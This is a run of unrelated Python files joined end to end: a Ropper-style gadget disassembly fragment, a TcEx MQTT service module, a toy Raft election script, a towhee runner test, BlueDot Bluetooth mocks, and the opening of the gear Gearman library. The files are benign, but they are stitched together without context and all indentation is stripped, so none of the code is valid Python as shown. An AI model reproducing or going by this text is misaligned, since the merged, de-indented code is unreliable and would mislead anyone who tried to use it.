def disassembleAddress(self, section, binary, vaddr, offset, count):
if vaddr % binary.arch.align != 0:
raise RopperError('The address doesn\'t have the correct alignment')
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
code = bytes(bytearray(section.bytes))
disassembler = capstone.Cs(binary.arch.arch, binary.arch.mode)
if count < 0:
return self.__disassembleBackward(section, binary, vaddr, offset, count*-1)
gadget = Gadget(binary.checksum, section.name, binary.arch)
c = 0
for i in disassembler.disasm(struct.pack('B' * len(code[offset:]), *bytearray(code[offset:])), offset):
gadget.append(i.address, i.mnemonic , i.op_str,bytes=i.bytes)
c += 1
if c == count:
break
if not len(gadget):
gadget.append(vaddr,'bad instructions')
return gadget
def toBytes(*b):
return bytes(bytearray(b))
|
common_service.py | """TcEx Framework Service Common module"""
# standard library
import json
import logging
import threading
import time
import traceback
import uuid
from datetime import datetime
from typing import Callable, Optional, Union
# first-party
from tcex.services.mqtt_message_broker import MqttMessageBroker
# get tcex logger
logger = logging.getLogger('tcex')
class CommonService:
"""TcEx Framework Service Common module
Shared service logic between the supported service types:
* API Service
* Custom Trigger Service
* Webhook Trigger Service
"""
def __init__(self, tcex: object):
"""Initialize the Class properties.
Args:
tcex: Instance of TcEx.
"""
self.tcex = tcex
# properties
self._ready = False
self._start_time = datetime.now()
self.args: object = tcex.inputs.model
self.configs = {}
self.heartbeat_max_misses = 3
self.heartbeat_sleep_time = 1
self.heartbeat_watchdog = 0
self.ij = tcex.ij
self.key_value_store = self.tcex.key_value_store
self.log = logger
self.logger = tcex.logger
self.message_broker = MqttMessageBroker(
broker_host=self.args.tc_svc_broker_host,
broker_port=self.args.tc_svc_broker_port,
broker_timeout=self.args.tc_svc_broker_conn_timeout,
broker_token=self.args.tc_svc_broker_token,
broker_cacert=self.args.tc_svc_broker_cacert_file,
)
self.ready = False
self.redis_client = self.tcex.redis_client
self.token = tcex.token
# config callbacks
self.shutdown_callback = None
def _create_logging_handler(self):
"""Create a logging handler."""
if self.logger.handler_exist(self.thread_name):
return
# create trigger id logging filehandler
self.logger.add_pattern_file_handler(
name=self.thread_name,
filename=f'''{datetime.today().strftime('%Y%m%d')}/{self.session_id}.log''',
level=self.args.tc_log_level,
path=self.args.tc_log_path,
# uuid4 pattern for session_id
pattern=r'^[0-9a-f]{8}-[0-9a-f]{4}-4[0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}.log$',
handler_key=self.session_id,
thread_key='session_id',
)
def process_acknowledged_command(
self, message: dict
) -> None: # pylint: disable=unused-argument
"""Process the Acknowledge command.
Args:
message: The message payload from the server topic.
"""
self.log.info(f'feature=service, event=acknowledge, message={message}')
def add_metric(self, label: str, value: Union[int, str]) -> None:
"""Add a metric.
Metrics are reported in heartbeat message.
Args:
label: The metric label (e.g., hits) to add.
value: The value for the metric.
"""
self._metrics[label] = value
@property
def command_map(self) -> dict:
"""Return the command map for the current Service type."""
return {
'acknowledged': self.process_acknowledged_command,
'brokercheck': self.process_broker_check,
'heartbeat': self.process_heartbeat_command,
'loggingchange': self.process_logging_change_command,
'shutdown': self.process_shutdown_command,
}
@staticmethod
def create_session_id() -> str: # pylint: disable=unused-argument
"""Return a uuid4 session id.
Returns:
str: A unique UUID string value.
"""
return str(uuid.uuid4())
def heartbeat(self) -> None:
"""Start heartbeat process."""
self.service_thread(name='heartbeat', target=self.heartbeat_monitor)
def heartbeat_broker_check(self) -> None:
"""Send self check message to ensure communications with message broker."""
message = {
'command': 'BrokerCheck',
'date': str(datetime.now()),
'heartbeat_watchdog': self.heartbeat_watchdog,
}
self.message_broker.publish(
message=json.dumps(message), topic=self.args.tc_svc_server_topic
)
# allow time for message to be received
time.sleep(5)
def heartbeat_monitor(self) -> None:
"""Publish heartbeat on timer."""
self.log.info('feature=service, event=heartbeat-monitor-started')
while True:
# check heartbeat is not missed
if self.heartbeat_watchdog > (
int(self.args.tc_svc_hb_timeout_seconds) / int(self.heartbeat_sleep_time)
):
# send self check message
self.heartbeat_broker_check()
self.log.error(
'feature=service, event=missed-heartbeat, action=shutting-service-down'
)
self.process_shutdown_command({'reason': 'Missed heartbeat commands.'})
break
time.sleep(self.heartbeat_sleep_time)
self.heartbeat_watchdog += 1
def increment_metric(self, label: str, value: Optional[int] = 1) -> None:
"""Increment a metric if already exists.
Args:
label: The metric label (e.g., hits) to increment.
value: The increment value. Defaults to 1.
"""
if self._metrics.get(label) is not None:
self._metrics[label] += value
def listen(self) -> None:
"""List for message coming from broker."""
self.message_broker.add_on_connect_callback(self.on_connect_handler)
self.message_broker.add_on_message_callback(
self.on_message_handler, topics=[self.args.tc_svc_server_topic]
)
self.message_broker.register_callbacks()
# start listener thread
self.service_thread(name='broker-listener', target=self.message_broker.connect)
def loop_forever(self, sleep: Optional[int] = 1) -> bool:
"""Block and wait for shutdown.
Args:
sleep: The amount of time to sleep between iterations. Defaults to 1.
Returns:
Bool: Returns True until shutdown received.
"""
while True:
deadline = time.time() + sleep
while time.time() < deadline:
if self.message_broker.shutdown:
return False
time.sleep(1)
return True
@property
def metrics(self) -> dict:
"""Return current metrics."""
# TODO: move to trigger command and handle API Service
if self._metrics.get('Active Playbooks') is not None:
self.update_metric('Active Playbooks', len(self.configs))
return self._metrics
@metrics.setter
def metrics(self, metrics: dict):
"""Return current metrics."""
if isinstance(metrics, dict):
self._metrics = metrics
else:
self.log.error('feature=service, event=invalid-metrics')
def on_connect_handler(
self, client, userdata, flags, rc # pylint: disable=unused-argument
) -> None:
"""On connect method for mqtt broker."""
self.log.info(
f'feature=service, event=topic-subscription, topic={self.args.tc_svc_server_topic}'
)
self.message_broker.client.subscribe(self.args.tc_svc_server_topic)
self.message_broker.client.disable_logger()
def on_message_handler(
self, client, userdata, message # pylint: disable=unused-argument
) -> None:
"""On message for mqtt."""
try:
# messages on server topic must be json objects
m = json.loads(message.payload)
except ValueError:
self.log.warning(
f'feature=service, event=parsing-issue, message="""{message.payload}"""'
)
return
# use the command to call the appropriate method defined in command_map
command: str = m.get('command', 'invalid').lower()
trigger_id: Optional[int] = m.get('triggerId')
if trigger_id is not None:
# coerce trigger_id to int in case a string was provided (testing framework)
trigger_id = int(trigger_id)
self.log.info(f'feature=service, event=command-received, command="{command}"')
# create unique session id to be used as thread name
# and stored as property of thread for logging emit
session_id = self.create_session_id()
# get the target method from command_map for the current command
thread_method = self.command_map.get(command, self.process_invalid_command)
self.service_thread(
# use session_id as thread name to provide easy debugging per thread
name=session_id,
target=thread_method,
args=(m,),
session_id=session_id,
trigger_id=trigger_id,
)
def process_broker_check(self, message: dict) -> None:
"""Implement parent method to log a broker check message.
.. code-block:: python
:linenos:
:lineno-start: 1
{
"command": "BrokerCheck",
}
Args:
message: The message payload from the server topic.
"""
self.log.warning(f'feature=service, event=broker-check, message={message}')
def process_heartbeat_command(self, message: dict) -> None: # pylint: disable=unused-argument
"""Process the HeartBeat command.
.. code-block:: python
:linenos:
:lineno-start: 1
{
"command": "Heartbeat",
"metric": {},
"memoryPercent": 0,
"cpuPercent": 0
}
Args:
message: The message payload from the server topic.
"""
self.heartbeat_watchdog = 0
# send heartbeat -acknowledge- command
response = {'command': 'Heartbeat', 'metric': self.metrics}
self.message_broker.publish(
message=json.dumps(response), topic=self.args.tc_svc_client_topic
)
self.log.info(f'feature=service, event=heartbeat-sent, metrics={self.metrics}')
def process_logging_change_command(self, message: dict) -> None:
"""Process the LoggingChange command.
.. code-block:: python
:linenos:
:lineno-start: 1
{
"command": "LoggingChange",
"level": "DEBUG"
}
Args:
message: The message payload from the server topic.
"""
level: str = message.get('level')
self.log.info(f'feature=service, event=logging-change, level={level}')
self.logger.update_handler_level(level)
def process_invalid_command(self, message: dict) -> None:
"""Process all invalid commands.
Args:
message: The message payload from the server topic.
"""
self.log.warning(
f'feature=service, event=invalid-command-received, message="""({message})""".'
)
def process_shutdown_command(self, message: dict) -> None:
"""Implement parent method to process the shutdown command.
.. code-block:: python
:linenos:
:lineno-start: 1
{
"command": "Shutdown",
"reason": "Service disabled by user."
}
Args:
message: The message payload from the server topic.
"""
reason = message.get('reason') or (
'A shutdown command was received on server topic. Service is shutting down.'
)
self.log.info(f'feature=service, event=shutdown, reason={reason}')
# acknowledge shutdown command
self.message_broker.publish(
json.dumps({'command': 'Acknowledged', 'type': 'Shutdown'}),
self.args.tc_svc_client_topic,
)
# call App shutdown callback
if callable(self.shutdown_callback):
try:
# call callback for shutdown and handle exceptions to protect thread
self.shutdown_callback() # pylint: disable=not-callable
except Exception as e:
self.log.error(
f'feature=service, event=shutdown-callback-error, error="""({e})""".'
)
self.log.trace(traceback.format_exc())
# unsubscribe and disconnect from the broker
self.message_broker.client.unsubscribe(self.args.tc_svc_server_topic)
self.message_broker.client.disconnect()
# update shutdown flag
self.message_broker.shutdown = True
# TODO: [review] this doesn't help if MainThread does not die.
# # delay shutdown to give App time to cleanup
# time.sleep(5)
# self.tcex.exit(ExitCode.SUCCESS) # final shutdown in case App did not
@property
def ready(self) -> bool:
"""Return ready boolean."""
return self._ready
@ready.setter
def ready(self, bool_val: bool):
"""Set ready boolean."""
if isinstance(bool_val, bool) and bool_val is True:
# wait until connected to send ready command
while not self.message_broker._connected:
if self.message_broker.shutdown:
break
time.sleep(1)
else: # pylint: disable=useless-else-on-loop
self.log.info('feature=service, event=service-ready')
ready_command = {'command': 'Ready'}
if self.ij.model.runtime_level.lower() in ['apiservice']:
ready_command['discoveryTypes'] = self.ij.model.service.discovery_types
self.message_broker.publish(
json.dumps(ready_command), self.args.tc_svc_client_topic
)
self._ready = True
def service_thread(
self,
name: str,
target: Callable[[], bool],
args: Optional[tuple] = None,
kwargs: Optional[dict] = None,
session_id: Optional[str] = None,
trigger_id: Optional[int] = None,
) -> None:
"""Start a message thread.
Args:
name: The name of the thread.
target: The method to call for the thread.
args: The args to pass to the target method.
kwargs: Additional args.
session_id: The current session id.
trigger_id: The current trigger id.
"""
self.log.info(f'feature=service, event=service-thread-creation, name={name}')
args = args or ()
try:
t = threading.Thread(name=name, target=target, args=args, kwargs=kwargs, daemon=True)
# add session_id to thread to use in logger emit
t.session_id = session_id
# add trigger_id to thread to use in logger emit
t.trigger_id = trigger_id
t.start()
except Exception:
self.log.trace(traceback.format_exc())
@property
def session_id(self) -> Optional[str]:
"""Return the current session_id."""
if not hasattr(threading.current_thread(), 'session_id'):
threading.current_thread().session_id = self.create_session_id()
return threading.current_thread().session_id
@property
def thread_name(self) -> str:
"""Return a uuid4 session id."""
return threading.current_thread().name
@property
def trigger_id(self) -> Optional[int]:
"""Return the current trigger_id."""
trigger_id = None
if hasattr(threading.current_thread(), 'trigger_id'):
trigger_id = threading.current_thread().trigger_id
if trigger_id is not None:
trigger_id = int(trigger_id)
return trigger_id
def update_metric(self, label: str, value: Union[int, str]) -> None:
"""Update a metric if already exists.
Args:
label: The metric label (e.g., hits) to update.
value: The updated value for the metric.
"""
if self._metrics.get(label) is not None:
self._metrics[label] = value
|
raft.py | import threading
import time
import random
import json
import math
import sys
import os
from Queue import Queue,Empty
#ELECTION_TIMEOUT_LIMITS = (150, 300)
HEARTHBEAT_INTERVAL = 150
ELECTION_PERIOD = 1000 # 1s for a candidate to wait for others response
class RaftNode(object):
def __init__(self, i):
self.i = i
self.raft_state = self.state = 'follower'
self.term = 0
self.HEARTHBEAT_TIMEOUT = 1000
self.ELECTION_TIMEOUT_LIMITS = (150, 300)
self.leader = None
# inner state that vary between :
# follower=>wait_for_candidate=>candidate=>leader
# =>did_vote
self.set_state('follower')
# some various timers
self.t_to_candidate = 0
# get the number of vote we have
self.nb_vote = 0
# and the election turn we have. This will increase the
# election_timeout when we go in candidate state
self.election_turn = 0
self.interrrupted = False
self.last_leader_talk = 0
def stop(self):
self.set_state('leaved')
self.interrrupted = True
def __str__(self):
return '(%d:%s)' % (self.i, self.state)
def tick(self, nodes):
pass
def set_state(self, state):
print self.i, "SWITCHING from ", self.state, "TO ", state
self.state = state
# Send a message to all other nodes, but not me
def send_to_others(self, nodes, m):
for d in nodes:
other = d['node']
if other.i != self.i:
d['queue'].put(m)
# Return a ok vote to the candidate_id node
def give_vote_to(self, nodes, candidate_id):
for d in nodes:
if d['node'].i == candidate_id:
m_ret = {'type':'vote', 'from':self.i}
d['queue'].put(m_ret)
# someone did ask us t ovote for him. We must not already have a leader, and
# we must be a follower or not already a candidate
def manage_ask_vote(self, m, nodes):
if self.leader == None and self.state in ['follower', 'wait_for_candidate']: # no leader? ok vote for you guy!
self.set_state('did-vote')
candidate_id = m['candidate']
self.give_vote_to(nodes, candidate_id)
# Someone did vote for me, but I must be a candidate to accept this
def manage_vote(self, m, nodes):
if self.state != 'candidate': # exit if not already a candidate
return
self.nb_vote += 1
quorum_size = math.ceil(float(len(nodes)+1)/2)
#print "I (%d) got a new voter %d" % (n.i, self.nb_vote)
if self.nb_vote >= quorum_size:
print "I (%d) did win the vote! with %d" % (self.i, self.nb_vote)
self.set_state('leader')
# warn every one that I am the leader
m_broad = {'type':'leader-elected', 'leader':self.i}
self.send_to_others(nodes, m_broad)
# A new leader is elected, take it
def manage_leader_elected(self, m, nodes):
elected_id = m['leader']
if elected_id == self.i:
# that's me, I alrady know about it...
return
if self.state == 'leader': # another leader?
print "TO MANAGE"*100, self.i, elected_id, self.term
elif self.state in ['candidate', 'follower', 'did-vote']: #
#print "GOT A LEADER JUST ELECTED", self.i, elected_id
self.leader = None
for d in nodes:
if d['node'].i == elected_id:
self.leader = d['node']
# Maybe it was a fake leader?
if self.leader is None:
return
if self.state == 'candidate':
print "I (%d) got a new leader (%d) before me, and I respect it" % (self.i, self.leader.i)
self.nb_vote = 0
self.set_state('follower')
self.t_to_candidate = 0
self.last_leader_talk = time.time()
# A new leader is elected, take it
def manage_leader_heartbeat(self, m, nodes):
leader_id = m['leader']
if self.leader is None:
# TODO: get the new leader? only if term is possible of course
return
if leader_id != self.leader.i:
print "NOT THE GOOD LEADER ASK US? WTF"
sys.exit(2)
return
if self.state != 'follower':
print "A leader ask me to ping but I am not a follower"
return
print "Acception leader ping"
# Ok accept this leader ping
self.last_leader_talk = time.time()
def look_for_candidated(self, nodes):
if time.time() > self.t_to_candidate:
print "N %d is going to be a candidate!" % self.i, self.state, self.leader
#self.state = self.raft_state = 'candidate'
self.set_state('candidate')
self.nb_vote = 1 # I vote for me!
possible_voters = nodes[:]
random.shuffle(possible_voters) # so not every one is asking the same on the same time
m = {'type':'ask-vote', 'candidate':self.i}
self.send_to_others(possible_voters, m)
# someone did ask us t ovote for him. We must not already have a leader, and
# we must be a follower or not already a candidate
def launch_heartbeat_to_others(self, nodes):
m = {'type':'leader-heartbeat', 'leader':self.i}
self.send_to_others(nodes, m)
# We did fail to elect someone, so we increase the election_turn
# so we will wait more for being candidate.
# also reset the states
def fail_to_elect(self):
print "Fail to elect, inscrease election turn"
self.election_turn += 1
self.reset()
# Get back to default values for vote things :)
def reset(self):
self.nb_vote = 0
self.set_state('follower')
self.t_to_candidate = 0
self.leader = None
self.last_leader_talk = 0
def main(self, q, nodes):
while not self.interrrupted:
self.node_loop(q, nodes)
if self.state not in ['did-vote', 'follower']:
print "END Of loop", self.state, self.term
if self.state == 'leader':
print "I AM STILL THE LEADER OF THE TERM", self.term
#time.sleep(1)
continue
# maybe we are not the leader and so we must look if localy
# we are ok
if self.state in ['follower', 'candidate', 'did-vote']:
if self.leader is not None:
continue
else:
self.fail_to_elect()
continue
def node_loop(self, q, nodes):
time.sleep(2)
start = time.time()
n = self
#print "Go run node", n.i, n.state
#print 'All nodes', ','.join([str(e['node']) for e in nodes])
#print n
while not self.interrrupted:#time.time() < start + (self.HEARTHBEAT_TIMEOUT/1000.0)*2:
# look for message before looking for a new state :)
try:
r = q.get_nowait()
except Empty:
r = ''
if r:
m = r
#print " %d I got a message: %s" % (n.i, m)
# Someone ask us for voting for them. We can only if we got no valid leader
# and we are a follower or not until a candidate
if m['type'] == 'ask-vote':
self.manage_ask_vote(m, nodes)
if m['type'] == 'vote': # someone did vote for me?
self.manage_vote(m, nodes)
# someone win the match, respect it
if m['type'] == 'leader-elected':
self.manage_leader_elected(m, nodes)
# a leader just ping me :)
if m['type'] == 'leader-heartbeat':
self.manage_leader_heartbeat(m, nodes)
# loop as fast as possible to get a new message now
continue
print "LOOP", self, "leader", self.leader
# If we are a follower witohout a leader, it means we are in the begining of our job
# and we need to see when we will start to be a candidate
if self.leader == None and self.state == 'follower':
low_election_timeout, high_election_timout = self.ELECTION_TIMEOUT_LIMITS
#print "INCREASING LOOP", 2**self.election_turn, high_election_timout * (2**self.election_turn)
#if high_election_timout > self.HEARTHBEAT_TIMEOUT:
# print 'WARNING, your election timeout is getting too high to be viable'
#high_election_timout = self.HEARTHBEAT_TIMEOUT
#os._exit(2)
# ask for a timeout between 150 and 300ms
election_timeout = random.randint(low_election_timeout, high_election_timout) * 0.001
self.t_to_candidate = time.time() + election_timeout
self.set_state('wait_for_candidate')
# if we have a leader and we are a follower, we must look if the leader
# did talk to us lately. If not, we start a new term
elif self.leader is not None and self.state == 'follower':
now = time.time()
if now > self.last_leader_talk + self.HEARTHBEAT_TIMEOUT/1000:
print self.i, "my leader is too old, I refute it"
self.leader = None
elif self.state == 'wait_for_candidate':
self.look_for_candidated(nodes)
# If I am the leader, we ping other so we respect us
elif self.state == 'leader':
self.launch_heartbeat_to_others(nodes)
time.sleep(0.01)
N = 3
nodes = [{'node':RaftNode(i), 'queue': Queue()} for i in range(N)]
def do_the_job(LOOP):
#nodes = [{'node':RaftNode(i), 'queue': Queue()} for i in range(N)]
threads = []
for d in nodes:
n = d['node']
q = d['queue']
t = threading.Thread(None, target=n.main, name='node-%d' % n.i, args=(q, nodes))
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
# did we got a leader?
print "RESULT FOR", LOOP
leader = None
max_vote = 0
for d in nodes:
n = d['node']
max_vote = max(max_vote, n.nb_vote)
if n.state == 'leader':
if leader != None:
print "WE GOT 2 LEADER, WTF DID YOU DID JEAN?????"
sys.exit("JEAN HOW CAN YOU BREAK SUCH AN ALGO?")
print "GOT A LEADER", n.i, 'with ', n.nb_vote, "LOOP", LOOP
leader = n
print "Candidate density::", LOOP, 300*(2**LOOP) / float(N), "ms", "& number of candidate in this loop (%d)" % LOOP, len([d for d in nodes if d['node'].state in ('candidate', 'leader')])
if leader is not None:
print "Good job jim", "LOOP", LOOP
sys.exit(0)
print "No leader, max vote is", max_vote
if __name__ == '__main__':
LOOP = 0
while True:
LOOP += 1
# Start with basic election
do_the_job(LOOP)
for d in nodes:
n = d['node']
n.fail_to_elect()
|
test_concat_runner.py | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from typing import Dict
import threading
from queue import Queue
from towhee.engine.operator_runner.runner_base import RunnerStatus
from towhee.engine.operator_runner.concat_runner import ConcatRunner
from towhee.operator.concat_operator import ConcatOperator
DATA_QUEUE = Queue()
class StopFrame:
pass
class MockReader:
"""
Mock reader
"""
def __init__(self, queue: Queue):
self._queue = queue
def read(self):
data = self._queue.get()
if not isinstance(data, StopFrame):
return data
else:
self._queue.put(StopFrame())
raise StopIteration()
class MockWriter:
def __init__(self):
self.res = []
def write(self, data: Dict):
self.res.append(data)
def run(runner):
runner.process()
class TestConcatRunner(unittest.TestCase):
"""
Concat runner test
"""
def test_concat_runner(self):
data_queue_1 = Queue()
data_queue_2 = Queue()
data_queue_3 = Queue()
writer = MockWriter()
runner = ConcatRunner(
'test',
0,
'add_operator',
'main',
'mock_operators', {'num': 1}, [MockReader(data_queue_1), MockReader(data_queue_2), MockReader(data_queue_3)],
writer
)
runner.set_op(ConcatOperator('row'))
t = threading.Thread(target=run, args=(runner, ))
t.start()
self.assertEqual(runner.status, RunnerStatus.RUNNING)
res = []
for i in range(3):
data_queue_1.put({'num1': i})
data_queue_2.put({'num2': i})
data_queue_3.put({'num3': i})
res.append({'num1': i, 'num2': i, 'num3': i})
data_queue_2.put(StopFrame())
for i in range(3):
data_queue_1.put({'num1': i + 3})
data_queue_3.put({'num3': i + 3})
res.append({'num1': i + 3, 'num3': i + 3})
data_queue_1.put(StopFrame())
data_queue_3.put(StopFrame())
runner.join()
for i in range(len(writer.res)):
self.assertEqual(writer.res[i], res[i])
self.assertEqual(runner.status, RunnerStatus.FINISHED)
if __name__ == '__main__':
unittest.main()
|
mock.py | from .btcomm import BluetoothServer, BluetoothClient, BluetoothAdapter
from .dot import BlueDot
from .threads import WrapThread
from .constants import PROTOCOL_VERSION
CLIENT_NAME = "Mock client"
class MockBluetoothAdapter(BluetoothAdapter):
def __init__(self, device = "mock0", address = "00:00:00:00:00:00"):
self._device = device
self._address = address
self._powered = True
self._discoverable = False
self._pairable = False
self._pairing_thread = None
@property
def powered(self):
return self._powered
@powered.setter
def powered(self, value):
self._powered = value
@property
def discoverable(self):
return self._discoverable
@discoverable.setter
def discoverable(self, value):
self._discoverable = value
@property
def pairable(self):
return self._pairable
@pairable.setter
def pairable(self, value):
self._pairable = value
@property
def paired_devices(self):
return [["01:01:01:01:01:01", "mock_device_1"], ["02:02:02:02:02:02", "mock_device_2"]]
class MockBluetoothServer(BluetoothServer):
"""
:class:`MockBluetoothServer` inherits from
:class:`~.btcomm.BluetoothServer` but overrides ``__init__``, :meth:`start`
, :meth:`stop` and :meth:`send_raw` to create a :class:`MockBluetoothServer` which can
be used for testing and debugging.
"""
def __init__(self,
data_received_callback,
auto_start = True,
device = "mock0",
port = 1,
encoding = "utf-8",
power_up_device = False,
when_client_connects = None,
when_client_disconnects = None):
super(MockBluetoothServer, self).__init__(
data_received_callback,
auto_start,
device,
port,
encoding,
power_up_device,
when_client_connects,
when_client_disconnects)
self._mock_client = None
def start(self):
self._running = True
def stop(self):
self._running = False
def mock_client_connected(self, mock_client = None):
"""
Simulates a client connected to the :class:`~.btcomm.BluetoothServer`.
:param MockBluetoothClient mock_client:
The mock client to interact with, defaults to `None`. If `None`,
client address is set to '99:99:99:99:99:99'
"""
self._mock_client = mock_client
if not self._client_connected:
if self._mock_client is None:
client_address = "99:99:99:99:99:99"
else:
client_address = self._mock_client.adapter.address
self._client_connected = True
self._client_info = (client_address, self.port)
#call the call back
if self.when_client_connects:
WrapThread(target=self.when_client_connects).start()
def mock_client_disconnected(self):
"""
Simulates a client disconnecting from the
:class:`~.btcomm.BluetoothServer`.
"""
if self._client_connected:
self._client_connected = False
self._client_info = None
if self._when_client_disconnects:
WrapThread(target=self.when_client_disconnects).start()
def mock_client_sending_data(self, data):
"""
Simulates a client sending data to the
:class:`~.btcomm.BluetoothServer`.
"""
if self._client_connected:
self._data_received_callback(data)
def _send_data(self, data):
if self._mock_client is not None:
# call the data received callback
if self._encoding:
data = data.decode(self._encoding)
self._mock_client.mock_server_sending_data(data)
def _setup_adapter(self, device):
self._adapter = MockBluetoothAdapter(device)
class MockBluetoothClient(BluetoothClient):
"""
:class:`MockBluetoothClient` inherits from
:class:`~.btcomm.BluetoothClient` but overrides ``__init__``, :meth:`connect`
and :meth:`send_raw` to create a :class:`MockBluetoothServer` which can
be used for testing and debugging.
Note - the `server` parameter should be an instance of :class:`MockBluetoothServer`.
"""
def __init__(self,
server,
data_received_callback,
port = 1,
device = "mock1",
encoding = "utf-8",
power_up_device = False,
auto_connect = True):
super(MockBluetoothClient, self).__init__(
server,
data_received_callback,
port,
device,
encoding,
power_up_device,
auto_connect)
def connect(self):
"""
Connect to a Bluetooth server.
"""
self._server.mock_client_connected(self)
self._connected = True
def disconnect(self):
"""
Disconnect from a Bluetooth server.
"""
self._server.mock_client_disconnected()
self._connected = False
def mock_server_sending_data(self, data):
"""
Simulates a server sending data to the
:class:`~.btcomm.BluetoothClient`.
"""
if self._connected:
self._data_received_callback(data)
def _send_data(self, data):
# send data to the server
# call the data received callback
if self._encoding:
data = data.decode(self._encoding)
self._server.mock_client_sending_data(data)
def _setup_adapter(self, device):
self._adapter = MockBluetoothAdapter(device, address = "11:11:11:11:11:11")
class MockBlueDot(BlueDot):
"""
:class:`MockBlueDot` inherits from :class:`BlueDot` but overrides
:meth:`_create_server`, to create a :class:`~.mock.MockBluetoothServer`
which can be used for testing and debugging.
"""
def _create_server(self):
self._server = MockBluetoothServer(
self._data_received,
when_client_connects = self._client_connected,
when_client_disconnects = self._client_disconnected,
device = self.device,
port = self.port,
power_up_device = self._power_up_device,
auto_start = False)
def mock_client_connected(self):
"""
Simulates a client connecting to the Blue Dot.
:param string client_address:
The mock client mac address, defaults to '11:11:11:11:11:11'
"""
self._server.mock_client_connected()
# send protocol version to server
self._server.mock_client_sending_data("3,{},{}\n".format(PROTOCOL_VERSION, CLIENT_NAME))
def mock_client_disconnected(self):
"""
Simulates a client disconnecting from the Blue Dot.
"""
self._server.mock_client_disconnected()
def mock_blue_dot_pressed(self, x, y):
"""
Simulates the Blue Dot being pressed.
:param int x:
The x position where the mock Blue Dot was pressed
:param int y:
The y position where the mock Blue Dot was pressed
"""
self._server.mock_client_sending_data("1,{},{}\n".format(x, y))
def mock_blue_dot_released(self, x, y):
"""
Simulates the Blue Dot being released.
:param int x:
The x position where the mock Blue Dot was released
:param int y:
The y position where the mock Blue Dot was released
"""
self._server.mock_client_sending_data("0,{},{}\n".format(x, y))
def mock_blue_dot_moved(self, x, y):
"""
Simulates the Blue Dot being moved.
:param int x:
The x position where the mock Blue Dot was moved too
:param int y:
The y position where the mock Blue Dot was moved too
"""
self._server.mock_client_sending_data("2,{},{}\n".format(x, y))
def launch_mock_app(self):
"""
Launches a mock Blue Dot app.
The mock app reacts to mouse clicks and movement and calls the mock blue
dot methods to simulates presses.
This is useful for testing, allowing you to interact with Blue Dot without
having to script mock functions.
The mock app uses pygame which will need to be installed.
"""
self._mock_app_thread = WrapThread(target=self._launch_mock_app)
self._mock_app_thread.start()
def _launch_mock_app(self):
#imported here, so pygame is only a pre-requisite for the mock app
from .app import BlueDotClient, ButtonScreen
class MockBlueDotClient(BlueDotClient):
def _run(self):
button_screen = MockButtonScreen(self._screen, self._font, self._device, self._server, self._width, self._height)
button_screen.run()
class MockButtonScreen(ButtonScreen):
def _connect(self):
self.bt_client = MockBluetoothClient(self.server, self._data_received, device = self.device, auto_connect = True)
MockBlueDotClient("mock2", self._server, None, None, None)
|
__init__.py | # Copyright 2013-2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import logging
import os
import random
import select
import six
import socket
import ssl
import struct
import threading
import time
import uuid as uuid_module
from gear import constants
from gear.acl import ACLError, ACLEntry, ACL # noqa
try:
import Queue as queue_mod
except ImportError:
import queue as queue_mod
try:
import statsd
except ImportError:
statsd = None
PRECEDENCE_NORMAL = 0
PRECEDENCE_LOW = 1
PRECEDENCE_HIGH = 2
class ConnectionError(Exception):
pass
class InvalidDataError(Exception):
pass
class ConfigurationError(Exception):
pass
class NoConnectedServersError(Exception):
pass
class UnknownJobError(Exception):
pass
class InterruptedError(Exception):
pass
class TimeoutError(Exception):
pass
class GearmanError(Exception):
pass
class DisconnectError(Exception):
pass
class RetryIOError(Exception):
pass
def convert_to_bytes(data):
try:
data = data.encode('utf8')
except AttributeError:
pass
return data
def best_tls_version():
if hasattr(ssl, 'PROTOCOL_TLS'):
return ssl.PROTOCOL_TLS
# Note there is some risk in selecting tls 1.2 if available
# as both the client and server may not support it and need 1.1
# or 1.0. However, a xenial installation with python 3.5 does
# support 1.2 which is probably as old a setup as we need to worry
# about.
elif hasattr(ssl, 'PROTOCOL_TLSv1_2'):
return ssl.PROTOCOL_TLSv1_2
elif hasattr(ssl, 'PROTOCOL_TLSv1_1'):
return ssl.PROTOCOL_TLSv1_1
elif hasattr(ssl, 'PROTOCOL_TLSv1'):
return ssl.PROTOCOL_TLSv1
else:
raise ConnectionError('No supported TLS version available.')
class Task(object):
def __init__(self):
self._wait_event = threading.Event()
def setComplete(self):
self._wait_event.set()
def wait(self, timeout=None):
"""Wait for a response from Gearman.
:arg int timeout: If not None, return after this many seconds if no
response has been received (default: None).
"""
self._wait_event.wait(timeout)
return self._wait_event.is_set()
class SubmitJobTask(Task):
def __init__(self, job):
super(SubmitJobTask, self).__init__()
self.job = job
class OptionReqTask(Task):
pass
class Connection(object):
"""A Connection to a Gearman Server.
:arg str client_id: The client ID associated with this connection.
It will be appending to the name of the logger (e.g.,
gear.Connection.client_id). Defaults to 'unknown'.
:arg bool keepalive: Whether to use TCP keepalives
:arg int tcp_keepidle: Idle time after which to start keepalives sending
:arg int tcp_keepintvl: Interval in seconds between TCP keepalives
:arg int tcp_keepcnt: Count of TCP keepalives to send before disconnect
"""
def __init__(self, host, port, ssl_key=None, ssl_cert=None, ssl_ca=None,
client_id='unknown', keepalive=False, tcp_keepidle=7200,
tcp_keepintvl=75, tcp_keepcnt=9):
self.log = logging.getLogger("gear.Connection.%s" % (client_id,))
self.host = host
self.port = port
self.ssl_key = ssl_key
self.ssl_cert = ssl_cert
self.ssl_ca = ssl_ca
self.keepalive = keepalive
self.tcp_keepcnt = tcp_keepcnt
self.tcp_keepintvl = tcp_keepintvl
self.tcp_keepidle = tcp_keepidle
